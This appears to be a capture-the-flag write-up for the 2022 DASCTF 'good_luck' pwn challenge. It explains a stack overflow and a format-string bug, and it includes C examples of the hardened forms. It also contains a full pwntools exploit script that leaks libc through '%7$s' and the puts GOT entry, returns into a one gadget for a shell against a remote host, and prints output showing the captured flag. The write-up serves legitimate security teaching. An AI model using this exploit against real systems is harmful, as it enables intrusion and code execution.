WriteUp: 2022DASCTF Apr X FATE: good_luck

0x0 Checksec

Arch:     amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)

0x1 Reverse Engineering

Two very obvious vulnerabilities: a stack overflow in the overflow function, and a format string vulnerability in the fmt function.
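The write-up does not reproduce the challenge source, so the following is an added educational example rather than the binary's own code: it assumes overflow() and fmt() follow the two classic shapes (an unbounded gets() into a fixed stack buffer, and printf() called with the user's text as the format string), shows those shapes only as comments, and places next to each one the bounded/parameterised form a fix would use. The 80-byte buffer size is an assumption taken from the padding length the exploit uses; read_line_bounded works on an in-memory string so it can be tested, and stands in for fgets(dst, sizeof dst, stdin).

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 80  /* assumed buffer size; the exploit pads with 80 bytes */

/* Pattern 1, vulnerable (kept as a comment, never compiled):
 *   void overflow_vulnerable(void) { char buf[BUF_LEN]; gets(buf); }
 * gets() has no length limit, so a longer line overwrites the saved rbp and
 * the return address; the binary has no stack canary to catch that. */

/* Hardened form: copy at most dst_len-1 bytes, stop at newline like fgets(),
 * always NUL-terminate. Returns the number of bytes stored. */
static size_t read_line_bounded(char *dst, size_t dst_len, const char *src) {
    size_t n = 0;
    if (dst_len == 0) return 0;
    while (n < dst_len - 1 && src[n] != '\0' && src[n] != '\n') {
        dst[n] = src[n];
        n++;
    }
    dst[n] = '\0';
    return n;
}

/* Feed a line of `attempt_len` 'a' bytes into a BUF_LEN stack buffer through
 * the bounded reader; the stack buffer can never receive more than 79 bytes. */
static size_t stored_after_attempt(size_t attempt_len) {
    char stack_buf[BUF_LEN];
    char *line = malloc(attempt_len + 1);
    if (line == NULL) return 0;
    memset(line, 'a', attempt_len);
    line[attempt_len] = '\0';
    size_t n = read_line_bounded(stack_buf, sizeof stack_buf, line);
    free(line);
    return n;
}

/* Pattern 2, vulnerable (comment only):
 *   void fmt_vulnerable(const char *buf) { printf(buf); }
 * User text becomes the format string, so a directive such as "%7$s" makes
 * printf fetch a pointer from the stack and print what it points to. */

/* Hardened form: the user's text is an argument, never the format. Returns 1
 * when the rendered output equals the input byte for byte, i.e. "%7$s" came
 * out as four literal characters. */
static int renders_literally(const char *user) {
    char out[64];
    int n = snprintf(out, sizeof out, "%s", user);
    return n >= 0 && (size_t)n < sizeof out && strcmp(out, user) == 0;
}

/* Cheap trust-boundary check: count '%' characters in input that is about to
 * reach any printf-family call, so a careless printf(buf) can be detected
 * in testing or logged at runtime. */
static int count_percent(const char *s) {
    int c = 0;
    for (; *s != '\0'; s++) {
        if (*s == '%') c++;
    }
    return c;
}

int main(void) {
    printf("bounded read of a 200-byte line stores %zu bytes (buffer is %d)\n",
           stored_after_attempt(200), BUF_LEN);
    printf("\"%%7$s\" rendered as data unchanged: %s\n",
           renders_literally("%7$s") ? "yes" : "no");
    printf("percent signs in \"%%7$s\": %d\n", count_percent("%7$s"));
    return 0;
}
```

The two hardened forms are what removes both bugs at once: a length-bounded read cannot reach the saved return address, and a user string passed as a "%s" argument cannot steer printf to read from the stack.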

0x2 Analyze

The string input for the format string attack is read with gets, which stops reading at 0x0a (the newline \n). The address of the ROP gadget pop rdi; ret happens to contain the byte 0x0a, so the plan of using a ROP chain to call elf.plt['puts'] and print elf.got['puts'] falls through.

To leak libc, the format string vulnerability can be used instead.

After leaking libc, use the stack overflow to hijack control flow and execute a one gadget.
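The two checks the analysis above depends on, written out as an added example (not part of the write-up's exploit): first, whether the 8-byte little-endian encoding of an address contains the byte an input routine stops at (0x0a for gets), which is exactly why the pop rdi; ret gadget cannot be delivered; second, whether a libc base computed from a leak is page aligned, which is the quick sanity check that the libc build and symbol offset were identified correctly. The gadget addresses and the puts leak are the values the write-up states; the puts offset 0x6f6a0 is derived from its output (puts_addr minus libc_base).

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* gets() stops at '\n' (0x0a); strcpy-style copies stop at 0x00.
 * Return the little-endian byte index (0..7) at which `v` first contains
 * `stop`, or -1 if it never does. A non-negative result means the qword
 * cannot pass whole through such an input routine. */
static int first_stop_byte(uint64_t v, uint8_t stop) {
    for (int i = 0; i < 8; i++) {
        if (((v >> (8 * i)) & 0xff) == stop) return i;
    }
    return -1;
}

/* libc base from a leaked symbol address. Returns 0 when the result is not
 * page aligned, the usual sign of a wrong libc build or symbol offset. */
static uint64_t libc_base_from_leak(uint64_t leaked, uint64_t sym_offset) {
    uint64_t base = leaked - sym_offset;
    if (base & 0xfff) return 0;
    return base;
}

int main(void) {
    /* Gadget addresses as stated in the write-up. */
    const uint64_t gadgets[] = { 0x400a23, 0x400a21, 0x40028e };
    const char *names[] = { "pop rdi; ret", "pop rsi; pop r15; ret", "ret" };
    for (int i = 0; i < 3; i++) {
        int idx = first_stop_byte(gadgets[i], 0x0a);
        if (idx < 0)
            printf("%-22s %#" PRIx64 ": no 0x0a byte, survives gets()\n",
                   names[i], gadgets[i]);
        else
            printf("%-22s %#" PRIx64 ": byte %d is 0x0a, gets() stops there\n",
                   names[i], gadgets[i], idx);
    }

    /* Leak from the write-up's output; 0x6f6a0 = puts_addr - libc_base there. */
    uint64_t base = libc_base_from_leak(0x7f95247f46a0ULL, 0x6f6a0ULL);
    printf("libc base: %#" PRIx64 " (%s)\n", base,
           base ? "page aligned" : "NOT aligned, wrong libc?");
    return 0;
}
```

Both pop gadgets sit at 0x400a2x, so byte 1 of each is 0x0a and gets truncates the payload there; the plain ret at 0x40028e survives. A wrong puts offset (for example one from a neighbouring libc build) shifts the base by a few bytes and fails the alignment check immediately, which is cheaper than discovering it when the one gadget does not land.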

0x3 Exploit Code

#!/usr/bin/env python3
from pwn import *

context.clear(arch='amd64', os='linux')
elf = context.binary = ELF("bin")
libc = elf.libc  # libc build identified from the leaked puts address (see below)

context.terminal = ["tmux", "split", "-h"]

if args.LOG:
    context.log_level = 'debug'

gs = '''
set breakpoint pending on
# b *0x40089F
b printf
continue
'''
# =============================================================================

def start():
    if args.GDB:
        # return gdb.debug(elf.path, gdbscript=gs)
        return process(elf.path)
    elif args.REMOTE:
        # 64.27.6.187 8888
        # return remote('64.27.6.187', 8888)
        return remote('39.99.242.16', 10000)
    else:
        return process(elf.path)

sla = lambda a, b: io.sendlineafter(a, b)
sa = lambda a, b: io.sendafter(a, b)
rl = lambda: io.recvline()

def good_start():
    # The service only takes the vulnerable path when it answers "luck!";
    # reconnect until it does (hence the repeated connections in the output).
    while True:
        io = start()
        io.recvuntil(b'>>\ngood luck\n')
        ctn = io.recvline()
        if ctn == b"luck!\n":
            return io
        io.close()
# =============================================================================

rop_rdi_ret = 0x400a23      # pop rdi ; ret   (contains 0x0a, cannot pass through gets)
rop_rsi_r15_ret = 0x400a21  # pop rsi ; pop r15 ; ret
rop_ret = 0x40028e          # ret

io = good_start()
if args.GDB:
    gdb.attach(io, gdbscript=gs)

io.timeout = 3000

# Stage 1: overflow the stack buffer, return into fmt(), then back into overflow()
payload = b'a'*80 + p64(0xbeadbeef)  # saved rbp

# payload += p64(rop_ret)
payload += p64(elf.sym.fmt)  # + p64(rop_ret)
payload += p64(elf.sym.overflow)*2

# payload = b"a"*80 + p64(0xbeadbeef) + p64(0xbeadbeef)

io.sendline(payload)

# Stage 2: format string leak. The 8-byte format "%7$saaaa" is followed by the
# GOT entry of puts, which printf reads as its 7th argument and dereferences.
io.recvuntil(b"fmt\n")
payload = b"%7$s".ljust(8, b'a') + p64(elf.got['puts'])
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('puts_addr: ' + hex(puts_addr))
# Use puts_addr to look up the libc version at https://libc.blukat.me/

libc.address = puts_addr - libc.sym['puts']

log.success('libc_base: ' + hex(libc.address))

# Stage 3: second overflow, return into the one gadget of the identified libc
payload = b'a'*80 + p64(0xbeadbeef)
# payload += p64(0x4527a + libc.address)
payload += p64(0x45226 + libc.address)


# payload = b'a'*80 + p64(0xbeadbeef) + p64(0xbeadbeef)
io.recvuntil(b"luck!\n")
io.sendline(payload)
# =============================================================================
io.sendline(b'cat flag.txt')
io.recvuntil(b'luck!\n')
flag = io.recvline()
log.success('flag: {}'.format(flag))

# io.interactive()
io.close()

0x4 Output Example

─$ python xpl.py REMOTE
[*] '2022DASCTF/good_luck/bin'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x3fe000)
[*] 'libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[*] Closed connection to 39.99.242.16 port 10000
[+] Opening connection to 39.99.242.16 on port 10000: Done
[+] puts_addr: 0x7f95247f46a0
[+] libc_base: 0x7f9524785000
[+] flag: b'DASCTF{7312255e-7b8a-4664-9a9f-3f67671452d7}\n'
[*] Closed connection to 39.99.242.16 port 10000

0x5 The Challenge

https://buuoj.cn/match/matches/95/challenges#good_luck